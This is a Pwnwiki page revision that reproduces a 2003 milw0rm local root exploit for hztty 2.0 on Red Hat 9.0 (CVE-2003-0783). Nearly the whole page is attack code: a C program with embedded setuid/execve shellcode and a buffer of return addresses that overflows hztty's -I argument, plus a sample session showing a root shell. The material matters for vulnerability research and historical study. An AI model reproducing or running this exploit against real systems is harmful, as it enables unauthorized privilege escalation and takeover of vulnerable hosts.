Pwnwiki: Created page with "==EXP==

 /*  0x333hztty => hztty 2.0 local root exploit  *  *  *	more info : Debian Security Advisory DSA 385-1  *  *	*note* I adjusted some part of hztty's code since  *..."

2021-05-03T12:38:03Z

Created page with "==EXP== <pre> /* 0x333hztty => hztty 2.0 local root exploit * * * more info : Debian Security Advisory DSA 385-1 * * *note* I adjusted some part of hztty's code since *..."

New page

==EXP==
<pre>
/* 0x333hztty => hztty 2.0 local root exploit
*
*
* more info : Debian Security Advisory DSA 385-1
*
* *note* I adjusted some part of hztty's code since
* there were some errors. hope this will not influence
* exploitation :> tested against Red Hat 9.0 :
*
* [c0wboy@0x333 c0wboy]$ gcc 0x333hztty.c -o k
* [c0wboy@0x333 c0wboy]$ ./k
*
* --- local root exploit for hztty 2.0 ---
* --- coded by c0wboy ~ 0x33 ---
*
* sh-2.05b# [./hztty started] [using /dev/ttyp6]
* sh-2.05b$ sh-2.05b# uid=0(root) gid=0(root) groups=500(c0wboy)
* sh-2.05b#
*
* coded by c0wboy
*
* (c) 0x333 Outsiders Security Labs
*
*/

#include <stdio.h>
#include <unistd.h>

#define BIN "./hztty"
#define SIZE 272

unsigned char shellcode[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8"
"\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
"\xd2\xb0\x0b\xcd\x80" ;

int main()
{
int i;
char out[SIZE];
char *own[] = { shellcode, 0x0 };

int *hztty = (int *)(out);
int ret = 0xbffffffa - strlen(BIN) - strlen(shellcode);

for (i=0 ; i<SIZE-1 ; i+=4)
*hztty++ = ret;

hztty = 0x0;

fprintf (stdout, "\n --- local root exploit for hztty 2.0 ---\n");
fprintf (stdout, " --- coded by c0wboy ~ www.0x333.org ---\n\n");

execle (BIN, BIN, "-I", out, 0x0, own, 0x0);
}

// milw0rm.com [2003-09-21]

</pre>

CVE-2003-0783 hztty 2.0 (RedHat 9.0) 本地特權提升漏洞 - Revision history

Pwnwiki: Created page with "==EXP==
/* 0x333hztty => hztty 2.0 local root exploit * * * more info : Debian Security Advisory DSA 385-1 * * note I adjusted some part of hztty's code since *..."